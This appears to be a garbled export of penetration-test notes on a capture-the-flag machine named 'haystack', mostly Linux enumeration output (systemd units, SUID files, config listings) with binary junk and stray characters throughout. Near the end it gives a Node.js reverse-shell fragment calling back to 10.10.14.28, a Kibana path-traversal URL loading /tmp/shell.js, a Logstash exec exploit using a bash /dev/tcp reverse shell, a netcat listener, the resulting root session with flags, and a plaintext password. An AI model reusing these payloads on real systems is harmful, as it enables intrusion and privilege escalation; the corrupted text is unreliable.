root root 838 Oct 30 2018 systemd-hwdb-update.service -rw-r--r--. 1 root root 523 Oct 30 2018 systemd-hybrid-sleep.service -rw-r--r--. 1 root root 693 Oct 30 201N8 systemd-importd.service -rw-r--r--. 1 root root 484 Oct 30 2018 systemd-initctl.service -rw-r--r--. 1 root root 524 Oct 30 2018 systemd-initctl.socket -rw-r--r--. 1 root root 738 Oct 30 2018 systemd-journal-catalog-update.service -rw-r--r--. 1 root root 1.2K Oct 30 2018 systemd-journald.service -rw-r--r--. 1 root root 833 Oct 30 2018 systemd-journald.socket -rw-r--r--. 1 root root 735 Oct 30 2018 systemd-journal-flush.service -rw-r--r--. 1 root root 561 Oct 30 2018 systemd-kexec.service -rw-r--r--. 1 root root 695 Oct 30 2018 systemd-localed.service -rw-r--r--. 1 root root 1.2K Oct 30 2018 systemd-logind.service -rw-r--r--. 1 root root 819 Oct 30 2018 systemd-machined.service -rw-r--r--. 1 root root 682 Oct 30 2018 systemd-machine-id-commit.service -rw-r--r--. 1 root root 1.1K Oct 30 2018 systemd-modules-load.service -rw-r--r--. 1 root root 676 Oct 30 2018 systemd-nspawn@.service -rw-r--r--. 1 root root 557 Oct 30 2018 systemd-poweroff.service -rw-r--r--. 1 root root 689 Oct 30O 2018 systemd-quotacheck.service -rw-r--r--. 1 root root 777 Oct 30 2018 systemd-random-seed.service -rw-r--r--. 1 root root 845 Oct 30 2018 systemd-readahead-collect.service -rw-r--r--. 1 root root 642 Oct 30 2018 systemd-readahead-done.service -rw-r--r--. 1 root root 635 Oct 30 2018 systemd-readahead-done.timer -rw-r--r--. 1 root root 555 Oct 30 2018 systemd-readahead-drop.service -rw-r--r--. 1 root root 757 Oct 30 2018 systemd-readahead-replay.service -rw-r--r--. 1 root root 552 Oct 30 2018 systemd-reboot.service -rw-r--r--. 1 root root 828 Oct 30 2018 systemd-remount-fs.service -rw-r--r--. 1 root root 813 Oct 30 2018 systemd-rfkill@.service -rw-r--r--. 1 root root 479 Oct 30 2018 systemd-shutdownd.service -rw-r--r--. 1 root root 528 Oct 30 2018 systemd-shutdownd.socket -rw-r--r--. 1 root root 501 Oct 30 2018 systemd-suspend.service -rw-r--r--. 1 root root 711 Oct 30 2018 systemd-sysctl.service -rw-r--r--. 1 root root 659 Oct 30 2018 systemd-timedated.service -rw-r--r--. 1 Proot root 669 Oct 30 2018 systemd-tmpfiles-clean.service -rw-r--r--. 1 root root 450 Oct 30 2018 systemd-tmpfiles-clean.timer -rw-r--r--. 1 root root 774 Oct 30 2018 systemd-tmpfiles-setup-dev.service -rw-r--r--. 1 root root 754 Oct 30 2018 systemd-tmpfiles-setup.service -rw-r--r--. 1 root root 595 Oct 30 2018 systemd-udevd-control.socket -rw-r--r--. 1 root root 570 Oct 30 2018 systemd-udevd-kernel.socket -rw-r--r--. 1 root root 812 Oct 30 2018 systemd-udevd.service -rw-r--r--. 1 root root 827 Oct 30 2018 systemd-udev-settle.service -rw-r--r--. 1 root root 751 Oct 30 2018 systemd-udev-trigger.service -rw-r--r--. 1 root root 701 Oct 30 2018 systemd-update-done.service -rw-r--r--. 1 root root 761 Oct 30 2018 systemd-update-utmp-runlevel.service -rw-r--r--. 1 root root 829 Oct 30 2018 systemd-update-utmp.service -rw-r--r--. 1 root root 581 Oct 30 2018 systemd-user-sessions.service -rw-r--r--. 1 root root 690 Oct 30 2018 systemd-vconsole-setup.service -rw-r--r--. 1 root root 433 OQct 30 2018 system.slice -rw-r--r--. 1 root root 652 Oct 30 2018 system-update.target -rw-r--r--. 1 root root 405 Oct 30 2018 timers.target -rw-r--r--. 1 root root 395 Oct 30 2018 time-sync.target -rw-r--r--. 1 root root 703 Oct 30 2018 tmp.mount -rw-r--r--. 1 root root 417 Oct 30 2018 umount.target -rw-r--r--. 1 root root 392 Oct 30 2018 user.slice -rw-r--r--. 1 root root 284 Oct 30 2018 microcode.service -rw-r--r--. 1 root root 465 Oct 30 2018 rsyslog.service -rw-r--r--. 1 root root 365 Oct 30 2018 wpa_supplicant.service -rw-r--r--. 1 root root 95 Oct 30 2018 fstrim.service -rw-r--r--. 1 root root 174 Oct 30 2018 fstrim.timer -rw-r--r--. 1 root root 657 Oct 30 2018 firewalld.service -rw-r--r--. 1 root root 172 Oct 30 2018 polkit.service -rw-r--r--. 1 root root 1.2K Oct 30 2018 auditd.service -rw-r--r--. 1 root root 184 Oct 30 2018 iprdump.service -rw-r--r--. 1 root root 143 Oct 30 2018 iprinit.service -rw-r--r--. 1 root root 147 Oct 30 2018 iprupdate.service -rw-r--r--.R 1 root root 173 Oct 30 2018 iprutils.target -rw-r--r--. 1 root root 463 Oct 30 2018 postfix.service -rw-r--r--. 1 root root 1.7K Sep 26 2018 elasticsearch.service -rw-r--r--. 1 root root 160 Aug 24 2018 brandbot.path -rw-r--r--. 1 root root 116 Aug 24 2018 brandbot.service -rw-r--r--. 1 root root 410 Aug 24 2018 rhel-autorelabel-mark.service -rw-r--r--. 1 root root 446 Aug 24 2018 rhel-autorelabel.service -rw-r--r--. 1 root root 408 Aug 24 2018 rhel-configure.service -rw-r--r--. 1 root root 217 Aug 24 2018 rhel-dmesg.service -rw-r--r--. 1 root root 331 Aug 24 2018 rhel-domainname.service -rw-r--r--. 1 root root 450 Aug 24 2018 rhel-import-state.service -rw-r--r--. 1 root root 437 Aug 24 2018 rhel-loadmodules.service -rw-r--r--. 1 root root 401 Aug 24 2018 rhel-readonly.service -rw-r--r--. 1 root root 376 Jul 4 2018 tuned.service -rw-r--r--. 1 root root 381 Apr 13 2018 plymouth-halt.service -rw-r--r--. 1 root root 396 Apr 13 2018 plymouth-kexec.service -rw-r--r--. 1 root roSot 393 Apr 13 2018 plymouth-poweroff.service -rw-r--r--. 1 root root 235 Apr 13 2018 plymouth-quit.service -rw-r--r--. 1 root root 243 Apr 13 2018 plymouth-quit-wait.service -rw-r--r--. 1 root root 282 Apr 13 2018 plymouth-read-write.service -rw-r--r--. 1 root root 386 Apr 13 2018 plymouth-reboot.service -rw-r--r--. 1 root root 546 Apr 13 2018 plymouth-start.service -rw-r--r--. 1 root root 295 Apr 13 2018 plymouth-switch-root.service -rw-r--r--. 1 root root 419 Apr 13 2018 systemd-ask-password-plymouth.path -rw-r--r--. 1 root root 400 Apr 13 2018 systemd-ask-password-plymouth.service -rw-r--r--. 1 root root 488 Apr 12 2018 chronyd.service -rw-r--r--. 1 root root 209 Apr 11 2018 irqbalance.service -rw-r--r--. 1 root root 313 Apr 11 2018 sshd-keygen.service -rw-r--r--. 1 root root 373 Apr 11 2018 sshd.service -rw-r--r--. 1 root root 260 Apr 11 2018 sshd@.service -rw-r--r--. 1 root root 181 Apr 11 2018 sshd.socket -rw-r--r--. 1 root root 208 Apr 10 2018 ebtables.service -rw-r-T-r--. 1 root root 209 Apr 10 2018 chrony-dnssrv@.service -rw-r--r--. 1 root root 138 Apr 10 2018 chrony-dnssrv@.timer -rw-r--r--. 1 root root 618 Mar 6 2018 nginx.service -rw-r--r--. 1 root root 472 Sep 15 2017 chrony-wait.service -rw-r--r--. 1 root root 243 Aug 4 2017 rdisc.service -rw-r--r--. 1 root root 244 Mar 17 2017 teamd@.service /lib/systemd/system/basic.target.wants: total 0 lrwxrwxrwx. 1 root root 48 Dec 11 2018 selinux-policy-migrate-local-changes@targeted.service -> ../selinux-policy-migrate-local-changes@.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx. 1 root root 15 Dec 11 2018 dbus.service -> ../dbus.service lrwxrwxrwx. 1 root root 32 Dec 11 2018 systemd-user-sessions.service -> ../systemd-user-sessions.service lrwxrwxrwx. 1 root root 25 Dec 11 2018 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx. 1U root root 15 Dec 11 2018 getty.target -> ../getty.target lrwxrwxrwx. 1 root root 33 Dec 11 2018 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx. 1 root root 24 Nov 28 2018 plymouth-quit.service -> ../plymouth-quit.service lrwxrwxrwx. 1 root root 29 Nov 28 2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx. 1 root root 14 Dec 11 2018 dbus.socket -> ../dbus.socket lrwxrwxrwx. 1 root root 26 Dec 11 2018 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx. 1 root root 27 Dec 11 2018 systemd-shutdownd.socket -> ../systemd-shutdownd.socket lrwxrwxrwx. 1 root root 31 Dec 11 2018 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx. 1 root root 30 Dec 11 2018 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx. 1 root root 25 Dec 11 2018 systemd-initctl.socket -> ../systemd-initctl.socket /lib/systemd/system/timVers.target.wants: total 0 lrwxrwxrwx. 1 root root 31 Dec 11 2018 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx. 1 root root 33 Dec 11 2018 systemd-vconsole-setup.service -> ../systemd-vconsole-setup.service lrwxrwxrwx. 1 root root 33 Dec 11 2018 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx. 1 root root 24 Dec 11 2018 systemd-udevd.service -> ../systemd-udevd.service lrwxrwxrwx. 1 root root 31 Dec 11 2018 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx. 1 root root 30 Dec 11 2018 systemd-update-done.service -> ../systemd-update-done.service lrwxrwxrwx. 1 root root 30 Dec 11 2018 systemd-update-utmp.service -> ../systemd-update-utmp.service lrwxrwxrwx. 1 root root 30 Dec 11 2018 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx. 1 root root 41 Dec 11 2018 systemd-journal-catalog-update.service -> ../systemd-jouWrnal-catalog-update.service lrwxrwxrwx. 1 root root 27 Dec 11 2018 systemd-journald.service -> ../systemd-journald.service lrwxrwxrwx. 1 root root 32 Dec 11 2018 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx. 1 root root 36 Dec 11 2018 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx. 1 root root 31 Dec 11 2018 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx. 1 root root 30 Dec 11 2018 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx. 1 root root 25 Dec 11 2018 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx. 1 root root 37 Dec 11 2018 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx. 1 root root 36 Dec 11 2018 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx. 1 root root 25 Dec 11 2018 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx. 1 root root 28 DeXc 11 2018 systemd-firstboot.service -> ../systemd-firstboot.service lrwxrwxrwx. 1 root root 20 Dec 11 2018 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx. 1 root root 22 Dec 11 2018 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx. 1 root root 19 Dec 11 2018 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx. 1 root root 28 Dec 11 2018 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx. 1 root root 36 Dec 11 2018 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx. 1 root root 32 Dec 11 2018 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx. 1 root root 26 Dec 11 2018 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx. 1 root root 25 Dec 11 2018 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx. 1 root root 30 Nov 28 2018 plymouth-read-write.service -> ../plymouth-read-write.service lrwxrwxrwx. 1 root root 25 Nov 28 2018 plymouth-start.service ->Y; ../plymouth-start.service /lib/systemd/system/runlevel5.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel3.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel4.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel1.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/runlevel2.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-ruZnlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx. 1 root root 26 Nov 28 2018 plymouth-reboot.service -> ../plymouth-reboot.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx. 1 root root 28 Nov 28 2018 plymouth-poweroff.service -> ../plymouth-poweroff.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx. 1 root root 29 Dec 11 2018 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx. 1 root root 39 Dec 11 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/initrd.target.wants: total 0 lrwxrwxrwx. 1 root root 29 Dec 1[1 2018 dracut-pre-trigger.service -> ../dracut-pre-trigger.service lrwxrwxrwx. 1 root root 26 Dec 11 2018 dracut-pre-udev.service -> ../dracut-pre-udev.service lrwxrwxrwx. 1 root root 25 Dec 11 2018 dracut-cmdline.service -> ../dracut-cmdline.service lrwxrwxrwx. 1 root root 27 Dec 11 2018 dracut-initqueue.service -> ../dracut-initqueue.service lrwxrwxrwx. 1 root root 23 Dec 11 2018 dracut-mount.service -> ../dracut-mount.service lrwxrwxrwx. 1 root root 27 Dec 11 2018 dracut-pre-mount.service -> ../dracut-pre-mount.service lrwxrwxrwx. 1 root root 27 Dec 11 2018 dracut-pre-pivot.service -> ../dracut-pre-pivot.service /lib/systemd/system/shutdown.target.wants: total 0 lrwxrwxrwx. 1 root root 26 Dec 11 2018 dracut-shutdown.service -> ../dracut-shutdown.service /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx. 1 root root 24 Nov 28 2018 plymouth-halt.service -> ../plymouth-halt.service /lib/systemd/system/initrd-switch-root.target.wants: total 0 lrwxrwxrwx. 1 roo\t root 25 Nov 28 2018 plymouth-start.service -> ../plymouth-start.service lrwxrwxrwx. 1 root root 31 Nov 28 2018 plymouth-switch-root.service -> ../plymouth-switch-root.service /lib/systemd/system/kexec.target.wants: total 0 lrwxrwxrwx. 1 root root 25 Nov 28 2018 plymouth-kexec.service -> ../plymouth-kexec.service /lib/systemd/system/dbus.target.wants: total 0 /lib/systemd/system/default.target.wants: total 0 /lib/systemd/system/syslog.target.wants: total 0 /lib/systemd/system-generators: total 648K -r-xr-xr-x. 1 root root 12K Nov 19 2018 lvm2-activation-generator -rwxr-xr-x. 1 root root 504 Nov 4 2018 kdump-dep-generator.sh -rwxr-xr-x. 1 root root 94K Oct 30 2018 systemd-cryptsetup-generator -rwxr-xr-x. 1 root root 65K Oct 30 2018 systemd-efi-boot-generator -rwxr-xr-x. 1 root root 49K Oct 30 2018 systemd-getty-generator -rwxr-xr-x. 1 root root 49K Oct 30 2018 systemd-hibernate-resume-generator -rwxr-xr-x. 1 root root 45K Oct 30 2018 systemd-rc-local-generator -rwxr-xr-x. 1] root root 127K Oct 30 2018 systemd-sysv-generator -rwxr-xr-x. 1 root root 49K Oct 30 2018 systemd-debug-generator -rwxr-xr-x. 1 root root 94K Oct 30 2018 systemd-fstab-generator -rwxr-xr-x. 1 root root 37K Oct 30 2018 systemd-system-update-generator /lib/systemd/user: total 16K lrwxrwxrwx. 1 root root 23 Dec 11 2018 timers.target -> ../system/timers.target lrwxrwxrwx. 1 root root 22 Dec 11 2018 sound.target -> ../system/sound.target lrwxrwxrwx. 1 root root 26 Dec 11 2018 smartcard.target -> ../system/smartcard.target lrwxrwxrwx. 1 root root 24 Dec 11 2018 sockets.target -> ../system/sockets.target lrwxrwxrwx. 1 root root 24 Dec 11 2018 printer.target -> ../system/printer.target lrwxrwxrwx. 1 root root 25 Dec 11 2018 shutdown.target -> ../system/shutdown.target lrwxrwxrwx. 1 root root 22 Dec 11 2018 paths.target -> ../system/paths.target lrwxrwxrwx. 1 root root 26 Dec 11 2018 bluetooth.target -> ../system/bluetooth.target -rw-r--r--. 1 root root 457 Oct 30 ^2018 basic.target -rw-r--r--. 1 root root 414 Oct 30 2018 default.target -rw-r--r--. 1 root root 499 Oct 30 2018 exit.target -rw-r--r--. 1 root root 501 Oct 30 2018 systemd-exit.service /lib/systemd/system-preset: total 20K -rw-r--r--. 1 root root 264 Nov 23 2018 85-display-manager.preset -rw-r--r--. 1 root root 3.8K Nov 23 2018 90-default.preset -rw-r--r--. 1 root root 10 Oct 30 2018 99-default-disable.preset -rw-r--r--. 1 root root 928 Oct 30 2018 90-systemd.preset -rw-r--r--. 1 root root 2.8K Oct 2 2017 90-epel.preset /lib/systemd/catalog: total 76K -rw-r--r--. 1 root root 9.7K Oct 30 2018 systemd.catalog -rw-r--r--. 1 root root 10K Oct 30 2018 systemd.fr.catalog -rw-r--r--. 1 root root 9.2K Oct 30 2018 systemd.it.catalog -rw-r--r--. 1 root root 9.3K Oct 30 2018 systemd.pl.catalog -rw-r--r--. 1 root root 9.6K Oct 30 2018 systemd.pt_BR.catalog -rw-r--r--. 1 root root 14K Oct 30 2018 systemd.ru.catalog /lib/systemd/user-preset: total 0 /lib/systemd/ntp-units.d: total 4.0K -rw-r--_r--. 1 root root 16 Apr 12 2018 50-chronyd.list /lib/systemd/system-shutdown: total 0 /lib/systemd/system-sleep: total 0 /lib/systemd/user-generators: total 0 ESC[00;33m### SOFTWARE #############################################ESC[00m ESC[00;31m[-] Sudo version:ESC[00m Sudo version 1.8.23 ESC[00;31m[-] www home dir contents:ESC[00m /var/www/: total 0 drwxr-xr-x. 3 nginx nginx 18 Nov 30 2018 . drwxr-xr-x. 20 root root 278 Nov 30 2018 .. drwxr-xr-x. 2 nginx nginx 42 Jan 25 2019 html /var/www/html: total 184K drwxr-xr-x. 2 nginx nginx 42 Jan 25 2019 . drwxr-xr-x. 3 nginx nginx 18 Nov 30 2018 .. -rw-r--r--. 1 nginx nginx 55 Jan 25 2019 index.html -rwxr--r--. 1 root root 179K Jan 25 2019 needle.jpg ESC[00;33m### INTERESTING FILES ####################################ESC[00m ESC[00;31m[-] Useful file locations:ESC[00m /usr/bin/curl ESC[00;31m[-] Can we read/write sensitive files:ESC[00m -rw-r--r--. 1 root root 1159 Jan 23 2019 /etc/passwd -rw-r--r--. 1 root root 538 Jan 23 201`9 /etc/group -rw-r--r--. 1 root root 1819 Oct 30 2018 /etc/profile ----------. 1 root root 805 Feb 6 2019 /etc/shadow ESC[00;31m[-] SUID files:ESC[00m -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh -rws--x--x. 1 root root 24048 Oct 30 2018 /usr/bin/chfn -rws--x--x. 1 root root 23960 Oct 30 2018 /usr/bin/chsh -rwsr-xr-x. 1 root root 44320 Oct 30 2018 /usr/bin/mount -rwsr-xr-x. 1 root root 64328 Oct 30 2018 /usr/bin/chage -rwsr-xr-x. 1 root root 78272 Oct 30 2018 /usr/bin/gpasswd -rwsr-xr-x. 1 root root 41872 Oct 30 2018 /usr/bin/newgrp -rwsr-xr-x. 1 root root 32208 Oct 30 2018 /usr/bin/su -rwsr-xr-x. 1 root root 32048 Oct 30 2018 /usr/bin/umount ---s--x--x. 1 root root 147392 Oct 30 2018 /usr/bin/sudo -rwsr-xr-x. 1 root root 23656 Oct 30 2018 /usr/bin/pkexec -rwsr-xr-x. 1 root root 57664 Nov 20 2018 /usr/bin/crontab -rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd-rwsr-xr-x. 1 root root 11216 Apr 11 2018 /usr/sbin/pam_timestamp_check -rwsr-xr-x. 1 root root 36a280 Apr 11 2018 /usr/sbin/unix_chkpwd -rwsr-xr-x. 1 root root 11376 Oct 30 2018 /usr/sbin/usernetctl -rwsr-xr-x. 1 root root 15512 Oct 30 2018 /usr/lib/polkit-1/polkit-agent-helper-1 -r-sr-xr-x. 1 root root 14320 Aug 27 2019 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper -r-sr-xr-x. 1 root root 13628 Aug 27 2019 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper -rwsr-x---. 1 root dbus 58024 Nov 2 2018 /usr/libexec/dbus-1/dbus-daemon-launch-helper ESC[00;33m[+] Possibly interesting SUID files:ESC[00m -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh ESC[00;33m[+] World-writable SUID files:ESC[00m -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh ESC[00;31m[-] SGID files:ESC[00m -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh -r-xr-sr-x. 1 root tty 15344 Jun 9 2014 /usr/bin/wall -rwxr-sr-x. 1 root tty 19624 Oct 30 2018 /usr/bin/write ---x--s--x. 1 root nobody 382240 Apr 11 2018 /usr/bin/ssh-agent -rwxr-sr-x. 1 root root 7208 Oct b30 2018 /usr/sbin/netreport -rwxr-sr-x. 1 root postdrop 218632 Oct 30 2018 /usr/sbin/postdrop -rwxr-sr-x. 1 root postdrop 260112 Oct 30 2018 /usr/sbin/postqueue -rwx--s--x. 1 root utmp 11192 Jun 9 2014 /usr/libexec/utempter/utempter ---x--s--x. 1 root ssh_keys 469880 Apr 11 2018 /usr/libexec/openssh/ssh-keysign ESC[00;33m[+] Possibly interesting SGID files:ESC[00m -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh ESC[00;33m[+] World-writable SGID files:ESC[00m -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh ESC[00;31m[+] Files with POSIX capabilities set:ESC[00m /usr/bin/ping = cap_net_admin,cap_net_raw+p /usr/sbin/arping = cap_net_raw+p /usr/sbin/clockdiff = cap_net_raw+p ESC[00;31m[-] World-writable files (excluding /proc and /sys):ESC[00m -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh ESC[00;31m[-] NFS config details: ESC[00m -rw-r--r--. 1 root root 0 Jun 7 2013 /etc/exports ESC[00;31m[-] NFS displaying partitions and filesystecms - you need to check if exotic filesystemsESC[00m # # /etc/fstab # Created by anaconda on Wed Nov 28 12:04:41 2018 # # Accessible filesystems, by reference, are maintained under '/dev/disk' # See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info # /dev/mapper/centos-root / xfs defaults 0 0 UUID=782e0556-01fa-4981-9f45-c39b049bacdf /boot xfs defaults 0 0 /dev/mapper/centos-swap swap swap defaults 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered ESC[00;31m[-] All *.conf files in /etc (recursive 1 level):ESC[00m -rw-r--r--. 1 root root 72 Jun 20 2019 /etc/resolv.conf -rw-r--r--. 1 root root 1285 Nov 2 2018 /etc/dracut.conf -rw-r--r--. 1 root root 9 Jun 7 2013 /etc/host.conf -rw-r--r--. 1 root root 216 Nov 2 201d8 /etc/sestatus.conf -rw-r--r--. 1 root root 28 Feb 27 2013 /etc/ld.so.conf -rw-r--r--. 1 root root 1746 Nov 28 2018 /etc/nsswitch.conf -rw-r--r--. 1 root root 641 Oct 30 2018 /etc/krb5.conf -rw-r--r--. 1 root root 449 Oct 30 2018 /etc/sysctl.conf -rw-r-----. 1 root root 191 Jun 19 2018 /etc/libaudit.conf -rw-r--r--. 1 root root 662 Jul 31 2013 /etc/logrotate.conf -rw-r--r--. 1 root root 55 Oct 30 2018 /etc/asound.conf -rw-r--r--. 1 root root 2391 Oct 12 2013 /etc/libuser.conf -rw-r--r--. 1 root root 842 Oct 30 2018 /etc/GeoIP.conf -rw-r--r--. 1 root root 970 Nov 4 2018 /etc/yum.conf -rw-r--r--. 1 root root 5171 Oct 30 2018 /etc/man_db.conf -rw-r--r--. 1 root root 3232 Oct 30 2018 /etc/rsyslog.conf -rw-r--r--. 1 root root 7265 Dec 11 2018 /etc/kdump.conf -rw-r--r--. 1 root root 1108 Apr 12 2018 /etc/chrony.conf -rw-r--r--. 1 root root 112 Oct 30 2018 /etc/e2fsck.conf -rw-r--r--. 1 root root 936 Oct 30 2018 /etc/mke2fs.conf -rw-r-----. 1 root root 3181 Oct 30 2018 /etc/sudo-ldap.conf -rw-er-----. 1 root root 1786 Oct 30 2018 /etc/sudo.conf -rw-r--r--. 1 root root 33 Jun 24 2019 /etc/vconsole.conf -rw-r--r--. 1 root root 19 Nov 28 2018 /etc/locale.conf ESC[00;31m[-] Current user's history files:ESC[00m lrwxrwxrwx. 1 root root 9 Jan 25 2019 /home/security/.bash_history -> /dev/null ESC[00;31m[-] Location and contents (if accessible) of .bash_history file(s):ESC[00m -rw-r--r--. 1 root root 2391 Oct 12 2013 /etc/libuser.conf -rw-r--r--. 1 root root 842 Oct 30 2018 /etc/GeoIP.conf -rw-r--r--. 1 root root 970 Nov 4 2018 /etc/yum.conf -rw-r--r--. 1 root root 5171 Oct 30 2018 /etc/man_db.conf -rw-r--r--. 1 root root 3232 Oct 30 2018 /etc/rsyslog.conf -rw-r--r--. 1 root root 7265 Dec 11 2018 /etc/kdump.conf -rw-r--r--. 1 root root 1108 Apr 12 2018 /etc/chrony.conf -rw-r--r--. 1 root root 112 Oct 30 2018 /etc/e2fsck.conf -rw-r--r--. 1 root root 936 Oct 30 2018 /etc/mke2fs.conf -rw-r-----. 1 root root 3181 Oct 30 2018 /etc/sudo-ldap.conf -rw-r-----. 1 root root 1786 Oct 30 2018 /etc/sudo.conf -rw-r--r--. 1 root root 33 Jun 24 2019 /etc/vconsole.conf -rw-r--r--. 1 root root 19 Nov 28 2018 /etc/locale.conf ESC[00;31m[-] Current user's history files:ESC[00m lrwxrwxrwx. 1 root root 9 Jan 25 2019 /home/security/.bash_history -> /dev/null ESC[00;31m[-] Location and contents (if accessible) of .bash_history file(s):ESC[00m /home/security/.bash_history ESC[00;31m[-] Location and Permissions (if accessible) of .bak file(s):ESC[00m -rw-r--r--. 1 root root 1735 Apr 10 2018 /etc/nsswitch.conf.bak -rw-rw-r--. 1 root root 7141 Sep 26 2018 /usr/share/kibana/node/lib/node_modules/npm/node_modules/request/node_modules/form-data/README.md.bak -rw-r--r--. 1 root root 7138 Sep 26 2018 /usr/share/kibana/node_modules/form-data/README.md.bak ESC[00;31m[-] Any interesting mail in /var/mail:ESC[00m lrwxrwxrwx. 1 root root 10 Nov 28 2018 /var/mail -> spool/mail ESC[00;33m### SCAN COMPLETE ####################################ESC[00m custom-colorsXAIZ|xAס- P#I'  File SystemWriteable Files\Directories Directory List find / -user kibana 2>/dev/null | grep -v usr | grep -v proc i7/ '  Running ProcessesProcess List custom-colors$AסQ )#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3Qquot;10.10.14.28", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })(); http://localhost:5601/api/console/api_server?apis=../../../../../../../../../tmp/shell.js Service Exploited: LogStash Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Output.conf uses exec and runs as root Exploit Code Used echo 'Ejecutar comando : bash -i >& /dev/tcp/10.10.XX.XX/1234 0>&1' > /opt/kibana/logex nc -lvnp 1234 Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAס X G/-'  Proof\Flags\Otherlistening on [any] 4444 ... connect to [10.10.14.28] from (UNKNOWN) [10.10.10.115] 59572 bash: no hay control de trabajos en este shell [root@haystack /]# whoami whoami root [root@haystack /]# ifconfig ifconfig bash: ifconfig: no se encontró la orden [root@haystack /]# cat /home/security/user.txt cat /home/security/user.txt 04d18bc79dac1d4d48ee0a940c8eb929 [root@haystack /]# cat /root/root.txt cat /root/root.txt 3f5f727c38d9f70e1d2ad2ba11059d92 [root@haystack /]# custom-colors$Aס=qM'  Passwordsuser: security pass: spanish.is.key custom-colors$AסВVf'   Hashescustom-colors$A?&&j /dev/pts/1 /etc/logstash/startup.options /var/lib/kibana /var/lib/kibana/uuid /var/lib/kibana/phantomjs-2.1.1-linux-x86_64 /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples /var/lib/kibana/phantomjs-2.1.1-linux-x86_64k/examples/colorwheel.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/scandir.js /var/lib/kibana/phantomjs-2.1.1-linux-x86_64/examples/page_events.js 